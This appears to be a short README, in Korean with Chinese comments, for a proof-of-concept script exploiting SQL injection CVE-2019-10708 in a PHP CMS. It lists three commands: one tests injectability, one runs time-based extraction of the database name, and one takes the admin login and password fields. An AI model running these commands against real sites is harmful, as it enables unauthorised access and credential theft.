
CVE-2019-10708 SQL 인젝션 PoC
exploit.py는 CVE-2019-10708 취약점에 대한 PoC로, multiprocessing을 이용해 인젝션을 수행하여 데이터베이스 이름과 백엔드 관리자 계정/비밀번호를 획득합니다(20190401 이전 버전 권장).
# 測試是否可注入
python3 exploit.py http:localhost/js/scms.php --test
# sleep時間為60秒與取得資料庫
python3 exploit.py http:localhost/js/scms.php -s 60 --db
# 取得A_login與A_pwd
python3 exploit.py http:localhost/js/scms.php --login --pwd